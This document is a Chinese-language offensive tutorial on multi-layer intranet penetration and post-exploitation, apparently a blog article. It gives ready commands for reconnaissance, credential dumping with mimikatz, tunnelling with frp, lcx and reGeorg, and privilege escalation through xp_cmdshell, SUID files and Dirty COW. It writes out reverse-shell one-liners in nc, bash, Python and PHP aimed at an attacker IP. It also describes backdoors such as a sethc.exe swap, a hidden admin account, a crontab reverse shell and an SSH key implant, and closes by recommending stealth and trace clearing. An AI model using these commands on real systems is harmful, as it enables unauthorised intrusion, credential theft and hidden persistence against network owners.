通过边界代理一路打到三层内网+后渗透通用手法
字数 1974 2025-08-26 22:11:40
内网渗透与后渗透技术详解
一、内网信息收集
1.1 内网信息收集概述
内网信息收集是围绕网络拓扑图展开的,主要收集内容包括:
- 内网网段信息(拓扑、分区)
- 内网核心业务信息(OA系统、邮件服务器、监控系统等)
- Windows/Linux主机信息
1.2 常用信息收集方法
主动扫描工具
- nmap
- netdiscover
- nc
- masscan
- 自写脚本
存活主机探测
-
Ping扫描:
- 优点:方便,不易触发报警
- 缺点:速度慢,防火墙可能影响结果
-
Nmap ICMP扫描:
nmap -sn -PE -n -v -oN 1.txt 目标IP参数说明:
-sn:不进行端口扫描-PE:进行ICMP echo扫描-n:不进行反向解析-v:输出调试信息-oN:输出到文件
-
Nmap ARP扫描(内网最快最准确):
nmap -sn -PR -n -v 目标IP -
netdiscover扫描:
netdiscover -i eth0 -r 目标IP -
nbtscan扫描(快速扫描存活PC端):
nbtscan -r 目标IP
端口和服务扫描
-
端口探测:
nmap -Pn -n 目标IP # 禁ping扫描 masscan -p 端口号 目标IP地址 --rate=10000 # 高速扫描 -
操作系统探测:
nmap --script smb-os-discovery.nse -p 445 目标IP nmap -O 目标IP -
漏洞扫描:
nmap --script=vuln 目标IP
1.3 Windows内网常用命令
| 命令 | 说明 |
|---|---|
net user |
本机用户列表 |
net view |
查询同一域内的机器列表 |
net localgroup administrators |
查看本机管理员 |
net user /domain |
查询域用户 |
net group /domain |
查询域里面的工作组 |
net group "domain admins" /domain |
查询域管理员用户组 |
1.4 Windows主机信息收集
收集内容:
- 系统管理员密码(hash->明文)
- 用户session、3389、IPC连接记录
- 浏览器密码和cookies
- Windows无线密码
- 数据库密码
- hosts文件、DNS缓存信息
- 杀毒软件、补丁、进程、网络代理信息
- 共享文件夹、web服务器配置文件等
常用工具:
- mimikatz
- wce
- getpass
- quarkspwdump
- reg-sam
- pwdump7
1.5 Linux信息收集
-
history命令:
history # 查看历史命令 history -c # 清空历史记录 -
last命令:
last # 查看系统登录记录 -
ARP检查:
arp -vn # 检查ARP欺骗
二、内网转发技术
2.1 内网转发目的
使外网能够访问内网服务,主要形式:
- 端口转发
- 端口映射
- 代理转发
2.2 端口转发工具
1. lcx工具
Windows版为lcx.exe,Linux版为portmap
基本命令:
- 转发端口:
lcx.exe -slave 公网IP 端口 内网IP 端口 - 监听端口:
lcx.exe -listen 转发端口 本机任意端口 - 映射端口:
lcx.exe -tran 映射端口号 IP 目标端口
2. frp工具
FRP是Go语言开发的反向代理应用,支持TCP/UDP/HTTP/HTTPS。
服务端配置(frps.ini):
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
token = 123456
客户端配置(frpc.ini):
[common]
server_addr = 192.168.152.217
server_port = 7000
token = 123456
[http]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 7001
3. Metasploit portfwd
portfwd add -l 本地监听端口 -p 目标端口 -r 目标机IP
portfwd list # 列出当前转发
2.3 代理工具
-
proxychains(Linux):
配置文件:/etc/proxychains.confproxychains 软件名 -
reGeorg:
python reGeorgSocksProxy.py -u http://靶机reGeorg脚本地址 -p 本地监听端口 -
proxifiler(Windows):
- 支持SOCKS4/SOCKS5/HTTP/TCP/UDP
- 有GUI界面
三、权限提升技术
3.1 Windows提权
系统漏洞提权流程:
- 获得目标机shell
- 查看补丁记录:
systeminfo - 使用补丁在线查询工具比对
- 寻找对应EXP
- 上传并执行EXP
数据库提权
-
MySQL提权:
- UDF提权
- MOF提权
- 启动项提权
-
SQL Server提权:
- xp_cmdshell提权
exec sp_configure 'show advanced options',1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure;
3.2 Linux提权
内核漏洞提权:
- 查看系统信息:
uname -a - 搜索对应EXP
- 上传并编译执行
SUID提权:
find / -perm -u=s -type f 2>/dev/null # 查找SUID文件
脏牛提权:
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
四、反弹Shell技术
4.1 常用反弹方式
-
nc反弹:
nc -lvp 监听端口 # 攻击机 nc 攻击机IP 监听端口 -e /bin/bash # 目标机 -
bash反弹:
bash -i >& /dev/tcp/攻击机IP/监听端口 0>&1 -
其他语言反弹:
- Python:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",监听端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); - PHP:
$sock=fsockopen("攻击机IP",监听端口);exec("/bin/sh -i <&3 >&3 2>&3");
- Python:
五、权限维持技术
5.1 Windows后门
-
Shift后门:
- 替换
C:\Windows\System32\sethc.exe为cmd.exe
- 替换
-
映像劫持:
- 修改注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
- 修改注册表:
-
计划任务后门:
schtasks /create /tn "任务名" /tr "程序路径" /sc minute /mo 1 -
影子账户:
net user test$ 123 /add # 修改注册表SAM键值
5.2 Linux后门
-
crontab后门:
*/1 * * * * bash -i >& /dev/tcp/攻击机IP/端口 0>&1 -
SSH公钥后门:
ssh-keygen -t rsa scp ~/.ssh/id_rsa.pub root@目标IP:/root/.ssh/authorized_keys -
SSH软连接后门:
ln -sf /usr/sbin/sshd /tmp/su /tmp/su -o Port=8080
六、多层内网渗透实例
6.1 渗透流程
- 外网Web漏洞获取边界机shell
- 边界机信息收集
- 建立一级代理(reGeorg+proxychains)
- 内网扫描发现二层主机
- 通过边界机路由转发到二层
- 二层主机上传bind木马
- 建立二级代理
- 三层内网渗透
6.2 Termite多层管理
- 第一节点运行agent:
./agent_版本 -l 端口 - 攻击机连接:
./admin_版本 -c 边界机IP -p 端口 - 添加二层节点:
./agent_版本 -c 上一层IP -p 上一层端口
以上内容涵盖了内网渗透的核心技术要点,包括信息收集、内网转发、权限提升、反弹Shell和权限维持等关键环节,并提供了实际渗透中的操作命令和工具使用方法。在实际渗透测试中,需要根据目标环境灵活组合这些技术,同时注意隐蔽性和痕迹清理。